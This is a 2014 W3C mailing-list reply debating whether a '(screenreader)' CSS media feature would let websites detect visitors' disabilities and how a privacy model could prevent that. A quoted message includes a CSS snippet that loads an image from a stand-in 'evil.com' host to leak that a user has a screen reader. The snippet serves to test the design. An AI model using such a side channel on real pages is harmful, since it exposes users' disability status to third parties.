Re: [css-speech][css-content][mediaqueries] Making Generated Content Accessible

> On 02 Dec 2014, at 22:58, James Craig <jcraig@apple.com> wrote:
> 
> 
>> On Dec 2, 2014, at 1:46 PM, Florian Rivoal <florian@rivoal.net> wrote:
>> 
>>> It'd be problematic to offer an unprotected "(screenreader)" media feature because it would offer any web page the ability to detect with a high degree of certainty that a visitor has a particular physical disability. In my opinion, it would be a privacy an personal security nightmare to implement *unless* CSS were to implement a media feature privacy model similar to the one defined in IndieUI User Context.
>> 
>> I agree that a privacy protecting model is worth having for something like this. However, unless I am missing something, the privacy model you propose doesn’t provide adequate protection. What prevents authors form doing this:
>> 
>> <style>
>> @media (screenreader) { #snoop { background: url(http://www.evil.com/info-leak.gif); } }
>> </style>
>> <div id=“snoop”></div>
> 
> That wouldn't ever load the image until after the user had approved access. It would also not be subject to a timing attack because the prompt would not block.

Aha, sorry, I had misunderstood the model, and thought that this cloaking applied only to the js apis (window.matchMedia & window.userSetting), but that the CSS would apply regardless.

I was hoping (without seeing how it would be possible) you’d have a model which allows something to be applied while pretending it’s not, similar to the trick on :visited, but better.

Now I see how the model makes sense. Users can’t both have the media query apply and hide its usage at the same time, but they get to pick which one it is. I guess that’s reasonable. I am up for including this in the MQ spec, and will bring it up to the WG. Is the indie-UI spec expected to become a good stable reference for the definition of the privacy model? I’d rather not need to inline that part into MQs if we can avoid it.

This raises 2 (related) questions. Is the introduction of this media feature sufficient to deprecate the “speech" media type into never matching? If not, can and should the same privacy model be applied to it?

 - Florian

Received on Tuesday, 2 December 2014 23:39:08 UTC